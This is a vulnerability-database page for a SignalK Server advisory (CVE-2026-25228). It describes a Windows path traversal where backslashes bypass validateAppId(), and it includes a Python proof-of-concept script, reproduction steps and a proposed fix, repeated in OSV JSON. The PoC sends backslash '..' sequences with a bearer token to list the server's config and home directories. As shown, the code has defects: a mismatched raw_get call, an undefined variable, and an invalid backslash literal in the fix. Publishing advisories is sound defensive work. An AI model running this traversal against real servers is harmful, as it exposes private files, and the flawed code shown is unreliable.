GHSA-VRHW-V2HW-JFFX

Vulnerability from github – Published: 2026-02-02 22:26 – Updated: 2026-02-03 16:13
VLAI?
Summary
SignalK Server has Path Traversal leading to information disclosure
Details

Summary

A Path Traversal vulnerability in SignalK Server's applicationData API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The validateAppId() function blocks forward slashes (/) but not backslashes (\), which are treated as directory separators by path.join() on Windows. This enables attackers to escape the intended applicationData directory.

Details

Platform: Windows (Linux only allows traversal up a single directory) Authentication Required: Yes (ability to write depends on user's permission)

The vulnerability exists in the validateAppId() function within the applicationData API handler. This function validates the appid parameter but only checks for forward slashes:

// Simplified vulnerable code pattern
function validateAppId(appid) {
  if (appid.includes('/') || appid.length >= 30) {
    return false;
  }
  return true;
}

// Later used in path construction
const dataPath = path.join(configPath, 'applicationData', 'users', deviceId, appid);

Root Cause: - The validation only blocks / characters - On Windows, path.join() uses the platform's native path separator - Windows treats both / and \ as valid directory separators - Backslash-based traversal sequences like ..\..\.. pass validation - When path.join() processes these on Windows, each .. traverses up one directory level

PoC

#!/usr/bin/env python3

import argparse
import http.client
import json
import sys
from urllib.parse import urlparse

PREFIX = "/signalk/v1/applicationData"


def raw_get(base, path, token):
    """
    GET using http.client so that '..' and backslashes in the URL
    are sent literally (requests/urllib would normalise them away).
    """
    parsed = urlparse(base)
    host, port = parsed.hostname, parsed.port or 80
    conn = http.client.HTTPConnection(host, port)
    conn.request("GET", path, headers={"Authorization": f"Bearer {token}"})
    resp = conn.getresponse()
    status = resp.status
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return status, body


def main():
    ap = argparse.ArgumentParser(description="Signal K Windows path traversal PoC")
    ap.add_argument("--target", required=True, help="e.g. http://192.168.1.100:3000")
    ap.add_argument("--token", required=True, help="any valid JWT token")
    args = ap.parse_args()

    base = args.target.rstrip("/")

    # On Windows, path.join(configPath, "applicationData", "users", id, appid)
    # resolves each '..' upward when separated by backslashes.
    #
    # Depth from base (configPath/applicationData/users/):
    #   ..              → applicationData/users/          (1 level)
    #   ..\..           → applicationData/                (2 levels)
    #   ..\..\..        → configPath (.signalk)           (3 levels)
    #   ..\..\..\..     → user home directory             (4 levels)

    traversals = [
        ("..\\..\\..\\", ".signalk config directory"),
        ("..\\..\\..\\..\\", "user home directory"),
    ]

    for appid, description in traversals:
        path = f"{PREFIX}/user/{appid}"
        status, body = raw_get(base, path, token, args.token)

        print(f"[{status}] {description}")
        print(f"  GET {path}")

        if status == 200:
            try:
                entries = json.loads(body)
                for entry in entries:
                    print(f"    {entry}")
            except json.JSONDecodeError:
                print(f"    {body[:200]}")
        else:
            print(f"    {body[:200]}")
        print()


if __name__ == "__main__":
    main()

Reproduction Steps:

  1. Set up SignalK Server on a Windows machine
  2. Obtain a valid device or user authentication token
  3. Run the PoC script: bash python3 poc_windows_appid_traversal.py --target http://[signalK server IP]:3000 --token <YOUR_TOKEN>

Recommended Fix

Short-term: 1. Add backslash validation to validateAppId(): javascript function validateAppId(appid) { if (appid.includes('/') || appid.includes('\') || appid.length >= 30) { return false; } return true; }

  1. Use path.normalize() and validate that resolved paths remain within the intended directory: javascript const resolvedPath = path.normalize(path.join(baseDir, appid)); if (!resolvedPath.startsWith(path.normalize(baseDir))) { throw new Error('Invalid path'); }
Severity ?
5.0 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.20.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "signalk-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.20.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25228"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-02T22:26:31Z",
    "nvd_published_at": "2026-02-02T23:16:10Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA Path Traversal vulnerability in SignalK Server\u0027s `applicationData` API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The `validateAppId()` function blocks forward slashes (`/`) but not backslashes (`\\`), which are treated as directory separators by `path.join()` on Windows. This enables attackers to escape the intended `applicationData` directory.\n\n### Details\n**Platform**: Windows (Linux only allows traversal up a single directory)\n**Authentication Required**: Yes (ability to write depends on user\u0027s permission)\n\nThe vulnerability exists in the `validateAppId()` function within the applicationData API handler. This function validates the `appid` parameter but only checks for forward slashes:\n\n```javascript\n// Simplified vulnerable code pattern\nfunction validateAppId(appid) {\n  if (appid.includes(\u0027/\u0027) || appid.length \u003e= 30) {\n    return false;\n  }\n  return true;\n}\n\n// Later used in path construction\nconst dataPath = path.join(configPath, \u0027applicationData\u0027, \u0027users\u0027, deviceId, appid);\n```\n\n**Root Cause:**\n- The validation only blocks `/` characters\n- On Windows, `path.join()` uses the platform\u0027s native path separator\n- Windows treats both `/` and `\\` as valid directory separators\n- Backslash-based traversal sequences like `..\\..\\..` pass validation\n- When `path.join()` processes these on Windows, each `..` traverses up one directory level\n\n### PoC\n```python\n#!/usr/bin/env python3\n\nimport argparse\nimport http.client\nimport json\nimport sys\nfrom urllib.parse import urlparse\n\nPREFIX = \"/signalk/v1/applicationData\"\n\n\ndef raw_get(base, path, token):\n    \"\"\"\n    GET using http.client so that \u0027..\u0027 and backslashes in the URL\n    are sent literally (requests/urllib would normalise them away).\n    \"\"\"\n    parsed = urlparse(base)\n    host, port = parsed.hostname, parsed.port or 80\n    conn = http.client.HTTPConnection(host, port)\n    conn.request(\"GET\", path, headers={\"Authorization\": f\"Bearer {token}\"})\n    resp = conn.getresponse()\n    status = resp.status\n    body = resp.read().decode(\"utf-8\", errors=\"replace\")\n    conn.close()\n    return status, body\n\n\ndef main():\n    ap = argparse.ArgumentParser(description=\"Signal K Windows path traversal PoC\")\n    ap.add_argument(\"--target\", required=True, help=\"e.g. http://192.168.1.100:3000\")\n    ap.add_argument(\"--token\", required=True, help=\"any valid JWT token\")\n    args = ap.parse_args()\n\n    base = args.target.rstrip(\"/\")\n\n    # On Windows, path.join(configPath, \"applicationData\", \"users\", id, appid)\n    # resolves each \u0027..\u0027 upward when separated by backslashes.\n    #\n    # Depth from base (configPath/applicationData/users/):\n    #   ..              \u2192 applicationData/users/          (1 level)\n    #   ..\\..           \u2192 applicationData/                (2 levels)\n    #   ..\\..\\..        \u2192 configPath (.signalk)           (3 levels)\n    #   ..\\..\\..\\..     \u2192 user home directory             (4 levels)\n\n    traversals = [\n        (\"..\\\\..\\\\..\\\\\", \".signalk config directory\"),\n        (\"..\\\\..\\\\..\\\\..\\\\\", \"user home directory\"),\n    ]\n\n    for appid, description in traversals:\n        path = f\"{PREFIX}/user/{appid}\"\n        status, body = raw_get(base, path, token, args.token)\n\n        print(f\"[{status}] {description}\")\n        print(f\"  GET {path}\")\n\n        if status == 200:\n            try:\n                entries = json.loads(body)\n                for entry in entries:\n                    print(f\"    {entry}\")\n            except json.JSONDecodeError:\n                print(f\"    {body[:200]}\")\n        else:\n            print(f\"    {body[:200]}\")\n        print()\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n**Reproduction Steps:**\n\n1. Set up SignalK Server on a Windows machine\n2. Obtain a valid device or user authentication token\n3. Run the PoC script:\n   ```bash\n   python3 poc_windows_appid_traversal.py --target http://[signalK server IP]:3000 --token \u003cYOUR_TOKEN\u003e\n   ```\n\n### Recommended Fix\n\n**Short-term:**\n1. Add backslash validation to `validateAppId()`:\n   ```javascript\n   function validateAppId(appid) {\n     if (appid.includes(\u0027/\u0027) || appid.includes(\u0027\\\u0027) || appid.length \u003e= 30) {\n       return false;\n     }\n     return true;\n   }\n   ```\n\n2. Use `path.normalize()` and validate that resolved paths remain within the intended directory:\n   ```javascript\n   const resolvedPath = path.normalize(path.join(baseDir, appid));\n   if (!resolvedPath.startsWith(path.normalize(baseDir))) {\n     throw new Error(\u0027Invalid path\u0027);\n   }\n   ```",
  "id": "GHSA-vrhw-v2hw-jffx",
  "modified": "2026-02-03T16:13:32Z",
  "published": "2026-02-02T22:26:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25228"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SignalK/signalk-server"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SignalK Server has Path Traversal leading to information disclosure"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.